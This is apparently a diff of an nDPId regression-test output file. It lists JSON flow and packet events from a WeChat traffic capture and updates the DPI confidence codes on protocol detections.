00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1369,"source":"wechat.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":1492167795098,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":90,"pkt_l4_len":36,"thread_ts_msec":1492167795098,"pkt":"MzMAAQAD0CeIF3AEht1gAAAAACQRAf6AAAAAAAAAkfk983Q2bNb\/AgAAAAAAAAAAAAAAAQADxQgU6wAk8ypP1gAAAAEAAAAAAAAKbGJqYW13cHR4egAAAQAB"} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1370,"source":"wechat.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1492167795099,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1492167795099,"pkt":"AQBeAAD80CeIF3AECABFoAA2Qc4AAAER1EDAqAFk4AAA\/OA5FOsAIm9WRGIAAAABAAAAAAAACG1jenRtcGtjAAABAAE="} @@ -399,101 +397,101 @@ 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1373,"source":"wechat.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":1492167795103,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":88,"pkt_l4_len":34,"thread_ts_msec":1492167795103,"pkt":"MzMAAQAD0CeIF3AEht1gAAAAACIRAf6AAAAAAAAAkfk983Q2bNb\/AgAAAAAAAAAAAAAAAQADwCsU6wAiwAT8cwAAAAEAAAAAAAAIY2Fuc2FxY3EAAAEAAQ=="} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1374,"source":"wechat.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795292,"flow_last_seen":1492167795292,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1492167795292,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1374,"source":"wechat.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1492167795292,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1492167795292,"pkt":"\/\/\/\/\/\/\/\/0CeIF3AECABFoABOQdAAAIARc3vAqAFkwKgB\/wCJAIkAOgI3\/v8BEAABAAAAAAAAIEVNRUNFS0VCRU5GSEZBRkVGSUZLQ0FDQUNBQ0FDQUFBAAAgAAE="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1374,"source":"wechat.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795292,"flow_last_seen":1492167795292,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1492167795292,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1374,"source":"wechat.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795292,"flow_last_seen":1492167795292,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1492167795292,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1375,"source":"wechat.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1492167795294,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1492167795294,"pkt":"\/\/\/\/\/\/\/\/0CeIF3AECABFoABOQdEAAIARc3rAqAFkwKgB\/wCJAIkAOgw8\/wABEAABAAAAAAAAIEVORURGS0ZFRU5GQUVMRURDQUNBQ0FDQUNBQ0FDQUFBAAAgAAE="} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1376,"source":"wechat.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1492167795295,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1492167795295,"pkt":"\/\/\/\/\/\/\/\/0CeIF3AECABFoABOQdIAAIARc3nAqAFkwKgB\/wCJAIkAOio7\/wEBEAABAAAAAAAAIEVERUJFT0ZERUJGQkVERkJDQUNBQ0FDQUNBQ0FDQUFBAAAgAAE="} -00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1383,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":73,"flow_first_seen":1492167639887,"flow_last_seen":1492167667658,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":39199,"flow_avg_l4_payload_len":536,"midstream":0,"thread_ts_msec":1492167796728,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54113,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00691{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1389,"source":"wechat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1492167338426,"flow_last_seen":1492167781907,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":1600,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167802662,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} -00682{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1389,"source":"wechat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1492167338426,"flow_last_seen":1492167781907,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":1600,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167802662,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1383,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":73,"flow_first_seen":1492167639887,"flow_last_seen":1492167667658,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":39199,"flow_avg_l4_payload_len":536,"midstream":0,"thread_ts_msec":1492167796728,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54113,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00691{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1389,"source":"wechat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1492167338426,"flow_last_seen":1492167781907,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":1600,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167802662,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00682{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1389,"source":"wechat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1492167338426,"flow_last_seen":1492167781907,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":1600,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167802662,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1395,"source":"wechat.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1492167815567,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":50,"pkt_l4_len":12,"thread_ts_msec":1492167815567,"pkt":"AQBeAAAB8IQvSpdgCABGoAAkj9sAAAEC8bDAqAH+4AAAAZQEAAARZOybAAAAAAIAAAA="} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1398,"source":"wechat.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1492167820408,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1492167820408,"pkt":"AQBeAAAWeJKcD6iOCABGwAAoAABAAAECQerAqAFn4AAAFpQEAAAiAPsCAAAAAQIAAADgAAD7"} 00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1401,"source":"wechat.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492167648494,"flow_last_seen":1492167695538,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167822531,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43851,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Tencent","breed":"Acceptable","category":"SocialNetwork"}} 00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1401,"source":"wechat.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492167648494,"flow_last_seen":1492167695538,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167822531,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43851,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00638{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1401,"source":"wechat.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492167640138,"flow_last_seen":1492167695550,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167822531,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54114,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1401,"source":"wechat.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492167640138,"flow_last_seen":1492167695550,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167822531,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1492167648277,"flow_last_seen":1492167720406,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3430,"flow_tot_l4_payload_len":7446,"flow_avg_l4_payload_len":310,"midstream":0,"thread_ts_msec":1492167844485,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43850,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.QQ","breed":"Fun","category":"Chat"}} -00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1492167695237,"flow_last_seen":1492167720429,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":12571,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":1492167844485,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54117,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1492167695488,"flow_last_seen":1492167720468,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":196,"midstream":0,"thread_ts_msec":1492167844485,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54118,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167648243,"flow_last_seen":1492167648277,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":495,"flow_tot_l4_payload_len":526,"flow_avg_l4_payload_len":263,"midstream":0,"thread_ts_msec":1492167844485,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":19041,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167650311,"flow_last_seen":1492167650345,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1492167844485,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60562,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1492167650348,"flow_last_seen":1492167650467,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":3552,"flow_avg_l4_payload_len":355,"midstream":0,"thread_ts_msec":1492167844485,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.67","src_port":35601,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1492167648277,"flow_last_seen":1492167720406,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3430,"flow_tot_l4_payload_len":7446,"flow_avg_l4_payload_len":310,"midstream":0,"thread_ts_msec":1492167844485,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43850,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.QQ","breed":"Fun","category":"Chat"}} +00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1492167695237,"flow_last_seen":1492167720429,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":12571,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":1492167844485,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54117,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1492167695488,"flow_last_seen":1492167720468,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":196,"midstream":0,"thread_ts_msec":1492167844485,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54118,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167648243,"flow_last_seen":1492167648277,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":495,"flow_tot_l4_payload_len":526,"flow_avg_l4_payload_len":263,"midstream":0,"thread_ts_msec":1492167844485,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":19041,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167650311,"flow_last_seen":1492167650345,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1492167844485,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60562,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1492167650348,"flow_last_seen":1492167650467,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":3552,"flow_avg_l4_payload_len":355,"midstream":0,"thread_ts_msec":1492167844485,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.67","src_port":35601,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1416,"source":"wechat.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1492167848542,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1492167848542,"pkt":"\/\/\/\/\/\/\/\/0CeIF3AECABFoADlWmgAAIARWkzAqAFkwKgB\/wCKAIoA0eSKEQ7\/A8CoAWQAigC7AAAgRUhFSkVQRkdFQkVPRU9FSkNORkFFRENBQ0FDQUNBQ0EAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJPAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAIQAAAAAAAAAAAOgDAAAAAAAAAAAhAFYAAwABAAAAAgAyAFxNQUlMU0xPVFxCUk9XU0UADwCA\/AoAR0lPVkFOTkktUEMAAAAAAAYBAxIFAA8BVaoA"} 00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1417,"source":"wechat.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167849769,"flow_last_seen":1492167849769,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492167849769,"l3_proto":"ip6","src_ip":"fe80::842:a3f3:a286:6c5b","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1417,"source":"wechat.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1492167849769,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":70,"pkt_l4_len":16,"thread_ts_msec":1492167849769,"pkt":"MzMAAAACuHgu4toHht1gCKryABA6\/\/6AAAAAAAAACEKj86KGbFv\/AgAAAAAAAAAAAAAAAAAChQD\/swAAAAABAbh4LuLaBw=="} -00618{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1417,"source":"wechat.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167849769,"flow_last_seen":1492167849769,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492167849769,"l3_proto":"ip6","src_ip":"fe80::842:a3f3:a286:6c5b","dst_ip":"ff02::2","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00618{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1417,"source":"wechat.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167849769,"flow_last_seen":1492167849769,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492167849769,"l3_proto":"ip6","src_ip":"fe80::842:a3f3:a286:6c5b","dst_ip":"ff02::2","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1418,"source":"wechat.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167851002,"flow_last_seen":1492167851002,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1492167851002,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00851{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1418,"source":"wechat.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1492167851002,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1492167851002,"pkt":"\/\/\/\/\/\/\/\/uHgu4toHCABFAAFI3+EAAP8R2sMAAAAA\/\/\/\/\/wBEAEMBNOAUAQEGADPq6ioAAAAAAAAAAAAAAAAAAAAAAAAAALh4LuLaBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEDNwcBeQMGD3f8OQIF3D0HAbh4LuLaBzIEwKgBajMEAHanAAwOaVBob25lZGlNb25pY2H\/AAAAAAAA"} -00729{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1418,"source":"wechat.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167851002,"flow_last_seen":1492167851002,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1492167851002,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"iphonedimonica","fingerprint":"1,121,3,6,15,119,252","class_ident":""}} 